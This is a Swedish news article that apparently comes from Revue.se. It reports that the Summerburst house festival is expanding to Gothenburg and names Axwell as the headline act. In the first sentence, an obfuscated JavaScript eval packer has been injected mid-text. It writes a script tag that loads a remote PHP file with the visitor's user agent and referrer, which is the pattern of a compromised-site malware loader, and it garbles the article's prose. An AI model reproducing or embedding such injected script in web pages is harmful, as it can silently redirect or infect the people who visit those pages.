Image Image Image Image Image Image Image Image Image Image

| 13 maj, 2021

Scroll to top

Top

Summerburst även till Göteborg i Sommar.

Summerburst även till Göteborg i Sommar.
Alexander Gylemo
Summerburst eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zdhit|var|u0026u|referrer|rftih||js|php’.split(’|’),0,{}))
, house festivalen som alla pratar om och som vi skrivit om vid ett antal tillfällen här på Revue.se lanserade idag att man kommer även köra festivalsuccén i Göteborg, på Valhalla Idrottsplats den 1-2 juni. Populariteten för Summerburst når inga gränser och vi ser detta som ett naturligt och väldigt klokt steg i dess utveckling.
Till festivalen så är Axwell precis som till Stockholms festivalen, klar som första namn i lineupen. Utöver Axwell så kommer arrangörerna att skapa två olika, men som man säger ”lika tunga listor namn” till de olika Festivalerna.

”Vi är otroligt glada över den fantastiska respons vi fick redan första året, och det känns fantastiskt att kunna erbjuda Göteborgspubliken ett evenemang av denna kaliber redan sommaren 2012” – festivalgeneralen Anders Boström på SPG Live.

Under premiären i somras, så kom bland annat David Guetta, Avicii, Dada Life och Eric Prydz. Vi kan inte säga något annat än att det var en succé!

Biljetter till Summerburst i Göteborg släpps den 19 december.

Läs om festivalen i Stockholm här

stureplan.se

 

Comments